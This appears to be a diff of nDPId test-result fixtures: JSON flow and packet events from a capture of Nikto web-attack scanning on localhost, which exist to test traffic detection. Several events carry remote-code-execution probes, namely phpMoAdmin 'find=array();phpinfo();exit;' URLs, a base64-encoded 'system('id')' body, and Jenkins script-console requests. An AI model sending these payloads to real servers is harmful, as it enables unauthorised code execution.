00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_packet_id":1,"flow_last_seen":1576420277929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1576420277929,"pkt":"AAAAAAAAAAAAAAAACABFAAC7MdtAAEAGCmB\/AAABfwAAAceYH5BhLQiUIFdU+oAYAED+rwAAAQEICp1m\/9GdZv\/RR0VUIC9zY3JpcHQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY5OTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} 
+01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_packet_id":1,"flow_last_seen":1576420277931,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277931,"pkt":"AAAAAAAAAAAAAAAACABFAADDfttAAEAGvVd\/AAABfwAAAceaH5AHCUeUa2pQhIAYAED+twAAAQEICp1m\/9OdZv\/SR0VUIC9qZW5raW5zL3NjcmlwdCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KDQo="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/jenkins\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/jenkins\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_packet_id":1,"flow_last_seen":1576420277933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277933,"pkt":"AAAAAAAAAAAAAAAACABFAADCrgRAAEAGji9\/AAABfwAAAcecH5DcgpdKIx+4uoAYAED+tgAAAQEICp1m\/9WdZv\/VR0VUIC9odWRzb24vc2NyaXB0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/hudson\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/hudson\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_packet_id":1,"flow_last_seen":1576420277971,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"thread_ts_msec":1576420277971,"pkt":"AAAAAAAAAAAAAAAACABFAAFctdFAAEAGhch\/AAABfwAAAcfMH5DMiIyc+KcBsoAYAED\/UAAAAQEICp1m\/\/udZv\/7R0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 
(Test:007011)"}} +01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_packet_id":1,"flow_last_seen":1576420277972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277972,"pkt":"AAAAAAAAAAAAAAAACABFAAFnwDVAAEAGe1l\/AAABfwAAAcfOH5AQvflnbGoufoAYAED\/WwAAAQEICp1m\/\/ydZv\/8R0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 
(Evasions:None) (Test:007011)"}} +01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_packet_id":1,"flow_last_seen":1576420277974,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277974,"pkt":"AAAAAAAAAAAAAAAACABFAAFncRdAAEAGynd\/AAABfwAAAcfQH5DeNEhBp6LH9oAYAED\/WwAAAQEICp1m\/\/2dZv\/9R0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 
(Evasions:None) (Test:007011)"}} +01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_packet_id":1,"flow_last_seen":1576420277975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277975,"pkt":"AAAAAAAAAAAAAAAACABFAAFkoPRAAEAGmp1\/AAABfwAAAcfSH5BFc5mo+BaB54AYAED\/WAAAAQEICp1m\/\/+dZv\/\/R0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 
(Evasions:None) (Test:007011)"}} +01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
